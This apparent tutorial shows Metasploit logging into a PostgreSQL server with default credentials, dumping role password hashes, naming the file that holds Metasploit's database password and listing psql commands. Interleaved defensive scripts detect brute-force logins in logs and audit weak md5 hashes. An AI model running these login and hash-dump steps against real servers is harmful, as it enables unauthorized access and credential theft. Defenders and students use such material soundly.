Metasploit - postgres

This post walks through using Metasploit to obtain a login to a PostgreSQL database, then dumping the database's user hashes and exploring users and accounts further. It covers connecting to the database, the default user and database, running SQL and psql commands to list databases, tables and table structure, and reading the database user's password from a configuration file. It also gives the steps for creating and dropping databases and tables and for renaming a table. Finally, it shows by example how to dump hashes from the database and use them in later steps.
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.107 
RHOSTS => 192.168.1.107
msf auxiliary(postgres_login) > set USERNAME postgres
USERNAME => postgres
msf auxiliary(postgres_login) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(postgres_login) > set DATABASE postgres
DATABASE => postgres
msf auxiliary(postgres_login) > run

[*] 192.168.1.107:5432 Postgres - [1/1] - Trying username:'postgres' with password:'postgres' on database 'postgres'
[+] 192.168.1.107:5432 Postgres - Logged in to 'postgres' with 'postgres':'postgres'
[+] 192.168.1.107:5432 Postgres - Success: postgres:postgres (Database 'postgres' succeeded.)
[*] 192.168.1.107:5432 Postgres - Disconnected
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
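The login scanner run above leaves a clear trace in the PostgreSQL server log. The script below is an added example, not code from this post or from Metasploit: it parses constructed server log lines (assumed format: `log_line_prefix = '%t [%p] %h '` with `log_connections = on`) and flags a host that repeatedly fails authentication against one role and then gets in. The function names and the sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Log format assumed for the constructed sample (not taken from the post):
#   log_line_prefix = '%t [%p] %h '  and  log_connections = on
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] (?P<host>\S+) "
    r"(?P<level>LOG|FATAL):\s+(?P<msg>.*)$"
)
FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
OK_RE = re.compile(r"connection authorized: user=(?P<user>\S+) database=\S+")

# Constructed sample: 192.168.1.50 fails four times against the 'postgres' role and
# then succeeds; 10.0.0.8 is a single typo; 10.0.0.9 is a normal login.
SAMPLE_LOG = """\
2014-08-03 22:27:40 UTC [4321] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2014-08-03 22:27:41 UTC [4322] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2014-08-03 22:27:41 UTC [4323] 10.0.0.8 FATAL:  password authentication failed for user "alice"
2014-08-03 22:27:42 UTC [4324] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2014-08-03 22:27:43 UTC [4325] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2014-08-03 22:27:44 UTC [4326] 192.168.1.50 LOG:  connection authorized: user=postgres database=postgres
2014-08-03 22:28:10 UTC [4327] 10.0.0.9 LOG:  connection authorized: user=alice database=app
"""


def parse_events(text):
    """Turn raw log lines into (timestamp, host, user, kind) tuples; kind is 'fail' or 'ok'."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines without an auth message (e.g. 'connection received') are skipped
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        msg = m.group("msg")
        f = FAIL_RE.search(msg)
        if f:
            events.append((ts, m.group("host"), f.group("user"), "fail"))
            continue
        o = OK_RE.search(msg)
        if o:
            events.append((ts, m.group("host"), o.group("user"), "ok"))
    return events


def detect(events, threshold=3, window=timedelta(seconds=60)):
    """Sliding-window rules per (host, user):
       - 'burst': at least `threshold` failures inside `window`
       - 'success_after_failures': an authorized connection preceded by failures inside `window`
    Each rule fires at most once per (host, user); returns a list of alert dicts."""
    recent = defaultdict(deque)  # (host, user) -> timestamps of failures still inside the window
    alerts, seen = [], set()
    for ts, host, user, kind in sorted(events):
        key = (host, user)
        q = recent[key]
        while q and ts - q[0] > window:
            q.popleft()
        if kind == "fail":
            q.append(ts)
            if len(q) >= threshold and (key, "burst") not in seen:
                seen.add((key, "burst"))
                alerts.append({"rule": "burst", "host": host, "user": user,
                               "failures": len(q), "at": ts})
        elif kind == "ok" and q and (key, "success_after_failures") not in seen:
            seen.add((key, "success_after_failures"))
            alerts.append({"rule": "success_after_failures", "host": host, "user": user,
                           "failures": len(q), "at": ts})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_LOG)):
        print(f"{a['at']} {a['rule']}: {a['user']}@{a['host']} after {a['failures']} failure(s)")
```

The second rule is the more useful one: a burst of failures followed by a success from the same source is the signature of a guessed or default credential, and is worth a password reset on that role and a review of `pg_hba.conf` for which hosts are allowed to reach it at all.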

The hashes of the postgres database users can also be dumped.

msf auxiliary(postgres_hashdump) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(postgres_hashdump) > set RHOSTS 192.168.1.107
RHOSTS => 192.168.1.107
msf auxiliary(postgres_hashdump) > run

[*] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username  Hash
 --------  ----
 postgres  3175bce1d3201d16594cebf9d7eb3f9d

[*] Hash Table has been saved: /root/.msf4/loot/20140803222742_default_192.168.1.107_postgres.hashes_142455.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
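The 32-hex-character value the module prints is a legacy md5-scheme role password: PostgreSQL stores `md5` followed by md5(password || username), so the only salt is the role name. The script below is an added example, not code from this post or from Metasploit. The first dump row is the one shown above; the `app_ro` row with a placeholder SCRAM-SHA-256 verifier, the `svc` role and the function names are constructed assumptions. It shows how to tell which roles still rely on md5 and how that value is derived, which is the argument for migrating them to scram-sha-256.

```python
import hashlib
import re

# md5-scheme values, with the 'md5' prefix as stored in pg_authid or without it as
# the hashdump output above prints them
MD5_RE = re.compile(r"^(?:md5)?([0-9a-f]{32})$")

# Constructed dump in the two-column layout postgres_hashdump prints.
# Row 1 is the role from this post; row 2 is a constructed placeholder SCRAM verifier.
SAMPLE_DUMP = """\
 Username  Hash
 --------  ----
 postgres  3175bce1d3201d16594cebf9d7eb3f9d
 app_ro    SCRAM-SHA-256$4096:c2FsdHNhbHQ=$c3RvcmVka2V5$c2VydmVya2V5
"""


def pg_md5(user, password):
    """PostgreSQL's legacy md5 role password: 'md5' + md5(password || username)."""
    return "md5" + hashlib.md5((password + user).encode()).hexdigest()


def classify(stored):
    """Name the password scheme behind a stored value from pg_shadow or a hashdump row."""
    if MD5_RE.match(stored):
        return "md5"
    if stored.startswith("SCRAM-SHA-256$"):
        return "scram-sha-256"
    return "unknown"


def matches_password(user, stored, password):
    """True if an md5-scheme value (prefixed or not) was derived from this password for this role."""
    m = MD5_RE.match(stored)
    if not m:
        return False
    return m.group(1) == pg_md5(user, password)[3:]


def parse_dump(text):
    """Read the 'Username  Hash' table into (role, stored_value) pairs, skipping the header."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or parts[0] in ("Username", "--------"):
            continue
        rows.append((parts[0], parts[1]))
    return rows


def audit(rows):
    """Return {role: scheme} and the list of roles that should be moved off md5."""
    schemes = {user: classify(h) for user, h in rows}
    to_migrate = [u for u, s in schemes.items() if s == "md5"]
    return schemes, to_migrate


if __name__ == "__main__":
    schemes, to_migrate = audit(parse_dump(SAMPLE_DUMP))
    for role, scheme in schemes.items():
        print(f"{role:10} {scheme}")
    print("roles still on md5:", ", ".join(to_migrate) or "none")
    # The salt is only the role name, so the same password for the same role name
    # yields the same value on every server:
    print(pg_md5("svc", "s3cret") == pg_md5("svc", "s3cret"), pg_md5("svc", "s3cret") != pg_md5("svc2", "s3cret"))
```

On a live server the same rows come from `SELECT rolname, rolpassword FROM pg_authid;` (superuser only), which is why a superuser login is enough to dump them. To retire the md5 scheme: set `password_encryption = scram-sha-256` in postgresql.conf, re-set the password of every role the audit lists (for example with `\password` in psql), and change the authentication method for those hosts in pg_hba.conf from `md5` to `scram-sha-256`.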

With the user and account information in hand, you can go on to collect more details.

Connect to a database. The default user and database are both postgres:
psql -U user -d dbname

Switch databases (equivalent to MySQL's use dbname):
\c dbname

List databases (equivalent to MySQL's show databases):
\l

List tables (equivalent to MySQL's show tables):
\dt

Show a table's structure (equivalent to desc tblname or show columns from tbname):
\d tblname

List indexes:
\di

Create a database:
create database [dbname];

Drop a database:
drop database [dbname];

Rename a table:
alter table [table_a] rename to [table_b];

Drop a table:
drop table [tblname];


Taking Metasploit's own database as an example: the password of Metasploit's database user is stored in the file /opt/metasploit/apps/pro/ui/config/database.yml.

root@gnu:~# psql -h 192.168.1.107 -U postgres
Password for user postgres: 
psql (9.1.13, server 8.3.1)
WARNING: psql version 9.1, server version 8.3.
         Some psql features might not work.
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.

postgres=# help
You are using psql, the command-line interface to PostgreSQL.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
General
  \copyright             show PostgreSQL usage and distribution terms
  \g [FILE] or ;         execute query (and send results to file or |pipe)
  \h [NAME]              help on syntax of SQL commands, * for all commands
  \q                     quit psql

Query Buffer
  \e [FILE] [LINE]       edit the query buffer (or file) with external editor
  \ef [FUNCNAME [LINE]]  edit function definition with external editor
  \p                     show the contents of the query buffer
  \r                     reset (clear) the query buffer
  \s [FILE]              display history or save it to file
  \w FILE                write query buffer to file

Input/Output
  \copy ...              perform SQL COPY with data stream to the client host
  \echo [STRING]         write string to standard output
  \i FILE                execute commands from file
  \o [FILE]              send all query results to file or |pipe
  \qecho [STRING]        write string to query output stream (see \o)

Informational
  (options: S = show system objects, + = additional detail)
  \d[S+]                 list tables, views, and sequences
  \d[S+]  NAME           describe table, view, sequence, or index
  \da[S]  [PATTERN]      list aggregates
  \db[+]  [PATTERN]      list tablespaces
  \dc[S]  [PATTERN]      list conversions
  \dC     [PATTERN]      list casts
  \dd[S]  [PATTERN]      show comments on objects
  \ddp    [PATTERN]      list default privileges
  \dD[S]  [PATTERN]      list domains
  \det[+] [PATTERN]      list foreign tables
  \des[+] [PATTERN]      list foreign servers
  \deu[+] [PATTERN]      list user mappings
  \dew[+] [PATTERN]      list foreign-data wrappers
  \df[antw][S+] [PATRN]  list [only agg/normal/trigger/window] functions
  \dF[+]  [PATTERN]      list text search configurations
  \dFd[+] [PATTERN]      list text search dictionaries
  \dFp[+] [PATTERN]      list text search parsers
  \dFt[+] [PATTERN]      list text search templates
  \dg[+]  [PATTERN]      list roles
  \di[S+] [PATTERN]      list indexes
  \dl                    list large objects, same as \lo_list
  \dL[S+] [PATTERN]      list procedural languages
  \dn[S+] [PATTERN]      list schemas
  \do[S]  [PATTERN]      list operators
  \dO[S+] [PATTERN]      list collations
  \dp     [PATTERN]      list table, view, and sequence access privileges
  \drds [PATRN1 [PATRN2]] list per-database role settings
  \ds[S+] [PATTERN]      list sequences
  \dt[S+] [PATTERN]      list tables
  \dT[S+] [PATTERN]      list data types
  \du[+]  [PATTERN]      list roles
  \dv[S+] [PATTERN]      list views
  \dE[S+] [PATTERN]      list foreign tables
  \dx[+]  [PATTERN]      list extensions
  \l[+]                  list all databases
  \sf[+] FUNCNAME        show a function's definition
  \z      [PATTERN]      same as \dp

Formatting
  \a                     toggle between unaligned and aligned output mode
  \C [STRING]            set table title, or unset if none
  \f [STRING]            show or set field separator for unaligned query output
  \H                     toggle HTML output mode (currently off)
  \pset NAME [VALUE]     set table output option
                         (NAME := {format|border|expanded|fieldsep|footer|null|
                         numericlocale|recordsep|tuples_only|title|tableattr|pager})
  \t [on|off]            show only rows (currently off)
  \T [STRING]            set HTML <table> tag attributes, or unset if none
  \x [on|off]            toggle expanded output (currently off)

Connection
  \c[onnect] [DBNAME|- USER|- HOST|- PORT|-]
                         connect to new database (currently "postgres")
  \encoding [ENCODING]   show or set client encoding
  \password [USERNAME]   securely change the password for a user
  \conninfo              display information about current connection

Operating System
  \cd [DIR]              change the current working directory
  \timing [on|off]       toggle timing of commands (currently off)
  \! [COMMAND]           execute command in shell or start interactive shell

Variables
  \prompt [TEXT] NAME    prompt user to set internal variable
  \set [NAME [VALUE]]    set internal variable, or list all if no parameters
  \unset NAME            unset (delete) internal variable

Large Objects
  \lo_export LOBOID FILE
  \lo_import FILE [COMMENT]
  \lo_list
  \lo_unlink LOBOID      large object operations

